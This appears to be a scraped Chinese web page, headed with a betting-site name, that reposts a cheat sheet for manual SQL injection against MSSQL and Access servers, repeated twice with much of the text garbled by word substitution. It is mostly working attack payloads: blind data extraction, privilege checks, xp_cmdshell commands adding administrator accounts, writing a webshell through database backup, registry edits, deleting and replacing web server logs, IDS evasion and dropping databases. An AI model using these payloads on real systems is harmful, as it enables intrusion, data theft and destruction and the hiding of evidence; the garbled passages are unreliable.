冠亚体育手机网站:SQL手工注入大全,sql手工注入语句

转自脚本之家:

sql手工业注入语句&SQL手工业注入大全(转),sql注入语句

转自脚本之家:

走访上面包车型大巴
1.剖断是不是有注入
;and 1=1
;and 1=2

2.初阶判别是不是是mssql
;and user>0

3.剖断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

4.流入参数是字符
‘and [查询条件] and ”=’

5.搜索时没过滤参数的
‘and [查询条件] and ‘%25’=’

6.猜数据库
;and (select Count(*) from [数据库名])>0

7.猜字段
;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测量试验权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘serveradmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘setupadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘securityadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’));–
;and 1=(select IS_MEMBER(‘db_owner’));–

11.增多mssql和系统的帐户
;exec master.dbo.sp_addlogin username;–
;exec master.dbo.sp_password null,username,password;–
;exec master.dbo.sp_addsrvrolemember sysadmin username;–
;exec master.dbo.xp_cmdshell ‘net user username password
/workstations:* /times:all /passwordchg:yes /passwordreq:yes
/active:yes /add’;–
;exec master.dbo.xp_cmdshell ‘net user username password /add’;–
;exec master.dbo.xp_cmdshell ‘net localgroup administrators username
/add’;–

12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ‘c:\’
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not
in(‘上步得到的paths’))>)

(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2
nvarchar(255),num3 nvarchar(255));–
;insert temp exec master.dbo.xp_availablemedia;– 得到当前有着驱动器
;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\’;–
得到子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\’;–
得到全部子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell ‘type
c:\web\index.asp’;– 查看文件的内容

13.mssql中的存款和储蓄进程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’
以八个记录集格局赶回全体键值
xp_regread 根键,子键,键值名
;exec xp_regread
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’CommonFilesDir’
再次回到制订键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWO瑞鹰D 表示整型
;exec xp_regwrite
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestvalueName’,’reg_sz’,’hello’
写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestvalueName’
删除有个别值
xp_regdeletekey
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’
删除键,包涵该键下全体值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’c:\l.asp’;

15.mssql内置函数
;and (select @@version)>0 获得Windows的本子号
;and user_name()=’dbo’ 剖断当前系统的连接客户是否sa
;and (select user_name())>0 爆当前系统的连年客户
;and (select db_name())>0 获得当前接连的数据库

16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’g:\wwwtest\l.asp’;

伸手的时候,像那标准用:

SQL手工业注入大全

前提供给工具:SQL Query Analyzer和SqlExec Sunx Version

1.去掉xp_cmdshell扩张进度的章程是运用如下语句:

if exists (select * from dbo.sysobjects where
id=object_id(N'[dbo].[xpcmdshell]’) and
OBJECTPROPERTY(id,N’IsExtendedProc’)=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]’

2.添加xp_cmdshell扩充过程的不二诀借使使用如下语句:

(1)SQL Query Analyzer

sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’

(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入

sp_addextendedproc ‘xp_cmdshell’,’xpsql70.dll’

去除

sp_dropextendedproc ‘xp_cmdshell’

(3)MSSQL2000

sp_addextendedproc ‘xp_cmdshell’,’xplog70.dll’

?

SQL手工业注入方法总结(SQL Server二〇〇七)二〇〇九-01-28
16:17———以下以简要注入点用U卡宴L替代

–(1) ******查看驱动器方法******

— 建表p(i为自动编号,a记录盘符类似”c:\”,b记录可用字节,另外省略)
URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c
nvarchar(255),d nvarchar(255));–

URL;insert p exec xp_availablemedia;–列出具有驱动器并插入表p

URL;and (select count(*) from p)>3;–折半法查出驱动器总量

UPAJEROL;and ascii(substring((select a from p where
i=1),1,1))=67;–折半法查出驱动器名(注asc(c)=67)

–上边一般用来无显错景况下行使——-就那样类推,得到全体驱动器名

UPRADOL;and (select a from p where i=1)>3;–报错获得第四个驱动器名

–下边一般用来显错境况下行使——-就那样推算,获得全部驱动器名

URL;;drop table p;–删除表p

–(2) ******查阅目录方法******

UCR-VL;create table pa(m nvarchar(255),i
nvarchar(255));–建表pa(m记录目录,i记录深度)

URL;insert pa exec xp_dirtree ’e:’;–列出驱动器e并插入表pa

URL;and (select count(*) from pa where
i>0)>-1;–折半法查出i深度

UEnclaveL;and (select top 1 m from pa where i=1 and m not in(select top 0 m
from pa))>0;–报错获得深度i=1的第二个目录名

–上边一般用显错且目录名不为数字景况下利用——-(获得第二个目录把”top
0″换为”top 1″,换深度只换i就行)就那样类推,获得e盘的具有目录

U汉兰达L;and len((select top 1 m from pa where i=1 and m not in(select top 0
m from pa)))>0;–折半法查出深度i=1的首先个目录名的长度

U福睿斯L;and ascii(substring((select top 1 m from pa where i=1 and m not
in(select top 0 m from
pa)),1,1))>0;–折半法查出深度i=1的首先个目录名的率先个字符长度

–上面一般用无显错情况下使用——-(获得第二个目录把”top 0″换为”top
1″,换深度只换i就行)就这样类推,获得e盘的兼具目录

URL;drop

手工业MSSQL注入常用SQL语句
and exists (select * from sysobjects) //判定是或不是是MSSQL
and exists(select * from tableName)
//剖断某表是或不是留存..tableName为表名
and 1=(select @@VERSION) //MSSQL版本
And 1=(select db_name()) //当前数码库名
and 1=(select @@servername) //本地服务名
and 1=(select IS_S奥德赛VROLEMEMBE传祺(‘sysadmin’)) //推断是还是不是是系统助理馆员
and 1=(Select IS_MEMBER(‘db_owner’)) //决断是不是是库权限
and 1= (Select HAS_DBACCESS(‘master’)) //判别是还是不是有库读取权限
and 1=(select name from master.dbo.sysdatabases where dbid=1)
//暴库名DBID为1,2,3….
;declare @d int //是还是不是帮助多行
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ‘X’ AND
name = ‘xp_cmdshell’) //判断XP_CMDSHELL是或不是留存
and 1=(select count(*) FROM master.dbo.sysobjects where name=
‘xp_regread’) //查看XP_regread扩充存款和储蓄进程是或不是早就被去除
拉长和删除一个SA权限的顾客test:(供给SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
停掉或激活有些服务。 (必要SA权限)
exec master..xp_servicecontrol ‘stop’,’schedule’
exec master..xp_servicecontrol ‘start’,’schedule’
暴网址目录
create table labeng(lala nvarchar(255), id int)
DECLARE @result varchar(255) EXEC master.dbo.xp_regread
‘HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual
Roots’,’/’,@result output insert into labeng(lala) values(@result);
and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from
labeng where lala>1)
—————————————————————————————————————————————————————分割
SQL Server
看清是不是可打针:

and 1=1
and 1=2
and 1=1
and 1=2
searchpoints%’ and 1=1
searchpoints%’ and 1=2
鲜明数据库类型:
and user>0
and (select count(*) from
sysobjects)>0
询问当前客户数量消息:
article.asp?id=6 having 1=1–
暴当前表中的列:
article.asp?id=6 group by admin.username having 1=1–
article.asp?id=6 group by admin.username,admin.password having 1=1–
暴跋扈表和列:
and (select top 1 name from (select top N id,name from sysobjects where
xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id(‘admin’),N) from sysobjects)>1
暴数据库数据:
and (select top 1 password from admin where id=N)>1
修改数据库中的数据:
;update admin set password=’oooooo’ where username=’xxx’
增添数据库中的数据:
;insert into admin values (xxx,oooooo)–
删数据库:
;drop database webdata
赢妥当前数据库顾客名:and user>0
收获当前数据库名:and db_name()>0
得到数据库版本:and (select @@version)>0
判别是还是不是匡助多句询问:;declare @a int–
看清是或不是辅助子查询:and (select count(1) from [sysobjects])>=0
数据库的扩大存储进程:exec master..xp_cmdshell
查阅服务器C盘目录:;exec_master..xp_cmdshell ‘dir c:\’
看清扩张存款和储蓄进程是还是不是存在:and select count(*) from
master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
复原扩展存款和储蓄进度:;exec sp_addextendedproc xp_cmdshell,’xplog70.dll’
去除扩展存款和储蓄进程:;exec sp_dropextendedproc ‘xp_cmdshell’
在MSSQL两千中提供了部分函数用于访谈OLE对象直接获取权力:
;declare @s int
;exec sp_oacreat ‘wscript.shell’,@s
;exec master..spoamethod @s,’run’,null,’cmd.exe/c dir c:\’
看清当前数据库客商名是不是持有相比高的权限:
and 1=(select is_srvrolemember(‘sysadmin’))
and 1=(select is_srvrolemember(‘serveradmin’))
and 1=(select is_srvrolemember(‘setupadmin’))
and 1=(select is_srvrolemember(‘securityadmin’))
and 1=(select is_srvrolemember(‘diskadmin’))
and 1=(select is_srvrolemember(‘bulkadmin’))
认清当前数据库顾客名是还是不是为DB_OWNER:
and 1=(select is_member(‘db_owner’))
在SQLSELacrosseVELX570的master.dbo.sysdatabases表中寄存着SQLSECRUISERVESportage数据库系统中的全部数据库新闻,只必要PUBLIC权限就可以对此表进行SELECT操作:
and (select top 1 name from master.dbo.sysdatabase order by dbid)>0
and (select top 1 name from master.dbo.sysdatabase where name not
in(select top 1 name from master.dbo.sysdatabases order by dbid) order
by dbid)>0
剔除日志记录:
;exec master.dbo.xp_cmdshell ‘del
c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt’
轮换日志记录:
;exec master.dbo.xp_cmdshell ‘copy
c:\winnt\system32\logfiles\w3svc5\ex070404.log
c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt’
获取WEB路径:
;declare @shell int
;exec master..sp_oamethod ‘wscript.shell’,@shell out
;exec master..sp_oamethod @shell,’run’,null,’cmd.exe/c dir /s
d:/index.asp >c:/log.txt
利用XP_CMDSHELL搜索:
;exec master..xp_cmdshell ‘dir /s d:/index.asp’
来得服务器网址配置音讯命令:
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum
w3svc/1/root
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum
w3svc/2/root
利用XP_REGREAD可用PUBLIC权限读取:
;exec master.dbo.xp_regread
hkey_local_machine,
‘system\currentcontrolset\services\w3svc\parameters\virtual
roots\’
‘/’
SQLSE奇骏VE奇骏下的高端本领能够参照阅读曾云好所著的相通脚本黑客第五章。
3、DSqlHelper
检查实验权限SYSADMIN:
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’))
serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin、db_owner。
检测XP_CMDSHELL(CMD命令):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘xp_cmdshell’)
检测XP_REGREAD(注册表读取作用):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘xp_regread’)
检测SP_MAKEWEBTASK(备份功效):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘sp_makewebtask’)
检测SP_ADDEXTENDEDPROC:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘sp_addextendedproc’)
检测XP_SUBDIEnclaveS读子目录:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘xp_subdirs’)
检测XP_DIRTREE读子目录:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘xp_dirtree’)
修改内容:
; UPDATE 表名 set 字段=内容 where 1=1
XP_CMDSHELL检测:
;exec master..xp_cmdshell ‘dir c:\’
修复XP_CMDSHELL:
;exec master.dbo.sp_addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’
用XP_CMDSHELL增添客户黑客:
;exec master.dbo.xp_cmdshell ‘net user hacker 123456 /add’
XP_CMDSHELL把用户hacker加到ADMIN组:
;exec master.dbo.xp_cmdshell ‘net localgroup administrators hacker
/add’
创建表test:
;create table [dbo].[test] ([dstr][char](255));
检查评定表段test:
and exists (select * from test)
读取WEB的职位(读注册表):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread
‘HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual
Roots’, ‘/’,@result output insert into test (dstr) values(@result);–
纸包不住火WEB的相对路径(显错形式):
and 1=(select count(*) from test where dstr > 1)
删除表test:
;drop table test;–
创立查看目录的表dirs:
;create table dirs(paths varchar(100), id int)
把查看目录的剧情插时钟dirs:
;insert dirs exec master.dbo.xp_dirtree ‘c:\’
爆目录的内容dirs:
and 0<>(select top 1 paths from dirs)
备份数据库DATANAME:
declare @a sysname; set @a=db_name();backup DATANAME @a to
disk=’c:\inetpub\wwwroot\down.bak’;–
删除表dirs:
;drop table dirs;–
创建表temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2
nvarchar(255),num3 nvarchar(255));–
把驱动盘列表参与temp表:
;insert temp exec master.dbo.xp_availablemedia;–
删除表temp:
;delete from temp;–
创建表dirs:
;create table dirs(paths varchar(100), id int);–
获得子目录列表XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs ‘c:\’;–
纸包不住火内容(显错方式):
and 0<>(select top 1 paths from dirs)
删除表dirs:
;delete from dirs;–
创建表dirs:
;create table dirs(paths varchar(100), id int)–
用XP_CMDSHELL查看目录内容:
;insert dirs exec master..xp_cmdshell ‘dir c:\’
删除表dirs:
;delete from dirs;–
检测SP_OAcreate(试行命令):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘SP_OAcreate’)
SP_OAcreate执行CMD命令:
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC
SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\cmd.exe /c net
user hacker 123456 /add’
SP_OAcreate建目录:
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC
SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\cmd.exe /c md
c:\inetpub\wwwroot\1111’
创设叁个设想目录E盘:
;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec
sp_oamethod @o, ‘run’, NULL,’ cscript.exe
c:\inetpub\wwwroot\mkwebdir.vbs -w “默认 Web 站点” -v “e”,”e:\”‘
安装虚构目录E为可读:
;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec
sp_oamethod @o, ‘run’, NULL,’ cscript.exe
c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse’
启动SERVER服务:
;exec master..xp_servicecontrol ‘start’, ‘server’
绕过IDS检测XP_CMDSHELL:
;declare @a sysname set @a=’xp_’+’cmdshell’ exec @a ‘dir c:\’
开启远程数据库1:
; select * from OPENROWSET(‘SQLOLEDB’,
‘server=servername;uid=sa;pwd=apachy_123’, ‘select * from table1’ )
敞开远程数据库2:
;select * from OPENROWSET(‘SQLOLEDB’,
‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’,
‘select * from table’

业已起来冒汗了.

原稿地址:

转自脚本之家: 看看上边包车型大巴 1.论断是还是不是有注入 ;and 1=1 ;and 1=2
2.先河推断是不是是mssql ;and us…

拜见上边包车型大巴
1.剖断是还是不是有注入
;and 1=1
;and 1=2

2.早先推断是不是是mssql
;and user>0

3.决断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

4.流入参数是字符
‘and [查询条件] and ”=’

5.寻找时没过滤参数的
‘and [查询条件] and ‘%25’=’

6.猜数据库
;and (select Count(*) from [数据库名])>0

7.猜字段
;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测验权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘serveradmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘setupadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘securityadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’));–
;and 1=(select IS_MEMBER(‘db_owner’));–

11.增加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;–
;exec master.dbo.sp_password null,username,password;–
;exec master.dbo.sp_addsrvrolemember sysadmin username;–
;exec master.dbo.xp_cmdshell ‘net user username password
/workstations:* /times:all /passwordchg:yes /passwordreq:yes
/active:yes /add’;–
;exec master.dbo.xp_cmdshell ‘net user username password /add’;–
;exec master.dbo.xp_cmdshell ‘net localgroup administrators username
/add’;–

12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ‘c:\’
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not
in(‘上步获得的paths’))>)

(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2
nvarchar(255),num3 nvarchar(255));–
;insert temp exec master.dbo.xp_availablemedia;– 获得当前颇具驱动器
;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\’;–
得到子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\’;–
获得全数子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell ‘type
c:\web\index.asp’;– 查看文件的剧情

13.mssql中的存款和储蓄进度
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’
以多个记录集格局赶回全部键值
xp_regread 根键,子键,键值名
;exec xp_regread
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’CommonFilesDir’
再次回到制订键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWOLANDD 表示整型
;exec xp_regwrite
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestvalueName’,’reg_sz’,’hello’
写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestvalueName’
删除某些值
xp_regdeletekey
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’
删除键,包含该键下全数值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’c:\l.asp’;

15.mssql内置函数
;and (select @@version)>0 获得Windows的本子号
;and user_name()=’dbo’ 判别当前系统的一连客商是否sa
;and (select user_name())>0 爆当前系统的连年顾客
;and (select db_name())>0 获得当前连日的数据库

16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’g:\wwwtest\l.asp’;

伸手的时候,像那标准用:

SQL手工注入大全

前提须要工具:SQL Query Analyzer和SqlExec Sunx Version

1.去掉xp_cmdshell扩大进度的措施是运用如下语句:

if exists (select * from dbo.sysobjects where
id=object_id(N'[dbo].[xpcmdshell]’) and
OBJECTPROPERTY(id,N’IsExtendedProc’)=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]’

2.添加xp_cmdshell扩张进度的方式是使用如下语句:

(1)SQL Query Analyzer

sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’

(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入

sp_addextendedproc ‘xp_cmdshell’,’xpsql70.dll’

去除

sp_dropextendedproc ‘xp_cmdshell’

(3)MSSQL2000

sp_addextendedproc ‘xp_cmdshell’,’xplog70.dll’

?

SQL手工业注入方法总计(SQL Server二〇〇六)二〇〇八-01-28
16:17———以下以简练注入点用UPRADOL替代

–(1) ******查看驱动器方法******

— 建表p(i为自动编号,a记录盘符类似”c:\”,b记录可用字节,别的省略)
URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c
nvarchar(255),d nvarchar(255));–

URL;insert p exec xp_availablemedia;–列出具有驱动器并插入表p

URL;and (select count(*) from p)>3;–折半法查出驱动器总量

UEvoqueL;and ascii(substring((select a from p where
i=1),1,1))=67;–折半法查出驱动器名(注asc(c)=67)

–上边一般用来无显错意况下利用——-由此及彼,得到全部驱动器名

ULX570L;and (select a from p where i=1)>3;–报错获得第一个驱动器名

–上边一般用来显错意况下利用——-依此类推,得到全部驱动器名

URL;;drop table p;–删除表p

–(2) ******查阅目录方法******

U奥迪Q3L;create table pa(m nvarchar(255),i
nvarchar(255));–建表pa(m记录目录,i记录深度)

URL;insert pa exec xp_dirtree ’e:’;–列出驱动器e并插入表pa

URL;and (select count(*) from pa where
i>0)>-1;–折半法查出i深度

UQX56L;and (select top 1 m from pa where i=1 and m not in(select top 0 m
from pa))>0;–报错获得深度i=1的第一个目录名

–上边一般用显错且目录名不为数字情形下使用——-(获得第贰个目录把”top
0″换为”top 1″,换深度只换i就行)就那样类推,获得e盘的持有目录

UEnclaveL;and len((select top 1 m from pa where i=1 and m not in(select top 0
m from pa)))>0;–折半法查出深度i=1的率先个目录名的尺寸

ULX570L;and ascii(substring((select top 1 m from pa where i=1 and m not
in(select top 0 m from
pa)),1,1))>0;–折半法查出深度i=1的率先个目录名的第1个字符长度

–下边一般用无显错景况下使用——-(获得第叁个目录把”top 0″换为”top
1″,换深度只换i就行)由此及彼,得到e盘的具有目录

URL;drop

手工MSSQL注入常用SQL语句
and exists (select * from sysobjects) //判定是不是是MSSQL
and exists(select * from tableName)
//判定某表是还是不是留存..tableName为表名
and 1=(select @@VERSION) //MSSQL版本
And 1=(select db_name()) //当前数码库名
and 1=(select @@servername) //本地服务名
and 1=(select IS_S昂科雷VROLEMEMBEKoleos(‘sysadmin’)) //剖断是或不是是系统管理员
and 1=(Select IS_MEMBER(‘db_owner’)) //判别是或不是是库权限
and 1= (Select HAS_DBACCESS(‘master’)) //推断是不是有库读取权限
and 1=(select name from master.dbo.sysdatabases where dbid=1)
//暴库名DBID为1,2,3….
;declare @d int //是或不是协助多行
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ‘X’ AND
name = ‘xp_cmdshell’) //判断XP_CMDSHELL是不是留存
and 1=(select count(*) FROM master.dbo.sysobjects where name=
‘xp_regread’) //查看XP_regread扩大存款和储蓄进度是还是不是已经被去除
加多和删除贰个SA权限的顾客test:(必要SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
停掉或激活某个服务。 (须求SA权限)
exec master..xp_servicecontrol ‘stop’,’schedule’
exec master..xp_servicecontrol ‘start’,’schedule’
暴网址目录
create table labeng(lala nvarchar(255), id int)
DECLARE @result varchar(255) EXEC master.dbo.xp_regread
‘HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual
Roots’,’/’,@result output insert into labeng(lala) values(@result);
and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from
labeng where lala>1)
—————————————————————————————————————————————————————分割
SQL Server
推断是不是可打针:

and 1=1
and 1=2
and 1=1
and 1=2
searchpoints%’ and 1=1
searchpoints%’ and 1=2
规定数据库类型:
and user>0
and (select count(*) from
sysobjects)>0
查询当前客户数据新闻:
article.asp?id=6 having 1=1–
暴当前表中的列:
article.asp?id=6 group by admin.username having 1=1–
article.asp?id=6 group by admin.username,admin.password having 1=1–
暴猖狂表和列:
and (select top 1 name from (select top N id,name from sysobjects where
xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id(‘admin’),N) from sysobjects)>1
暴数据库数据:
and (select top 1 password from admin where id=N)>1
修改数据库中的数据:
;update admin set password=’oooooo’ where username=’xxx’
扩展数据库中的数据:
;insert into admin values (xxx,oooooo)–
删数据库:
;drop database webdata
获取当前数据库客商名:and user>0
取妥当前数据库名:and db_name()>0
得到数据库版本:and (select @@version)>0
剖断是或不是补助多句询问:;declare @a int–
判别是或不是辅助子查询:and (select count(1) from [sysobjects])>=0
数据库的恢宏存款和储蓄进程:exec master..xp_cmdshell
查看服务器C盘目录:;exec_master..xp_cmdshell ‘dir c:\’
决断扩张存储进度是还是不是留存:and select count(*) from
master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
回复扩充存款和储蓄进度:;exec sp_addextendedproc xp_cmdshell,’xplog70.dll’
除去扩大存储进度:;exec sp_dropextendedproc ‘xp_cmdshell’
在MSSQL3000中提供了有的函数用于访谈OLE对象间接获取权力:
;declare @s int
;exec sp_oacreat ‘wscript.shell’,@s
;exec master..spoamethod @s,’run’,null,’cmd.exe/c dir c:\’
推断当前数据库客商名是还是不是富有相比较高的权杖:
and 1=(select is_srvrolemember(‘sysadmin’))
and 1=(select is_srvrolemember(‘serveradmin’))
and 1=(select is_srvrolemember(‘setupadmin’))
and 1=(select is_srvrolemember(‘securityadmin’))
and 1=(select is_srvrolemember(‘diskadmin’))
and 1=(select is_srvrolemember(‘bulkadmin’))
看清当前数据库客户名是或不是为DB_OWNER:
and 1=(select is_member(‘db_owner’))
在SQLSE奥德赛VE凯雷德的master.dbo.sysdatabases表中寄存着SQLSE瑞虎VE中华V数据库系统中的全体数据库音讯,只要求PUBLIC权限就足以对此表展开SELECT操作:
and (select top 1 name from master.dbo.sysdatabase order by dbid)>0
and (select top 1 name from master.dbo.sysdatabase where name not
in(select top 1 name from master.dbo.sysdatabases order by dbid) order
by dbid)>0
去除日志记录:
;exec master.dbo.xp_cmdshell ‘del
c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt’
轮换日志记录:
;exec master.dbo.xp_cmdshell ‘copy
c:\winnt\system32\logfiles\w3svc5\ex070404.log
c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt’
获取WEB路径:
;declare @shell int
;exec master..sp_oamethod ‘wscript.shell’,@shell out
;exec master..sp_oamethod @shell,’run’,null,’cmd.exe/c dir /s
d:/index.asp >c:/log.txt
利用XP_CMDSHELL搜索:
;exec master..xp_cmdshell ‘dir /s d:/index.asp’
突显服务器网址配置音信命令:
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum
w3svc/1/root
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum
w3svc/2/root
利用XP_REGREAD可用PUBLIC权限读取:
;exec master.dbo.xp_regread
hkey_local_machine,
‘system\currentcontrolset\services\w3svc\parameters\virtual
roots\’
‘/’
SQLSE迈凯伦540CVE大切诺基下的高端技巧能够参照他事他说加以考察阅读曾云好所著的贯通脚本黑客第五章。
3、DSqlHelper
检验权限SYSADMIN:
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’))
serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin、db_owner。
检测XP_CMDSHELL(CMD命令):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘xp_cmdshell’)
检测XP_REGREAD(注册表读取成效):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘xp_regread’)
检测SP_MAKEWEBTASK(备份功效):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘sp_makewebtask’)
检测SP_ADDEXTENDEDPROC:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘sp_addextendedproc’)
检测XP_SUBDI揽胜极光S读子目录:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘xp_subdirs’)
检测XP_DIRTREE读子目录:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘xp_dirtree’)
修改内容:
; UPDATE 表名 set 字段=内容 where 1=1
XP_CMDSHELL检测:
;exec master..xp_cmdshell ‘dir c:\’
修复XP_CMDSHELL:
;exec master.dbo.sp_addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’
用XP_CMDSHELL增多客商骇客:
;exec master.dbo.xp_cmdshell ‘net user hacker 123456 /add’
XP_CMDSHELL把用户hacker加到ADMIN组:
;exec master.dbo.xp_cmdshell ‘net localgroup administrators hacker
/add’
创建表test:
;create table [dbo].[test] ([dstr][char](255));
检验表段test:
and exists (select * from test)
读取WEB的地点(读注册表):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread
‘HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual
Roots’, ‘/’,@result output insert into test (dstr) values(@result);–
爆出WEB的相对路线(显错格局):
and 1=(select count(*) from test where dstr > 1)
删除表test:
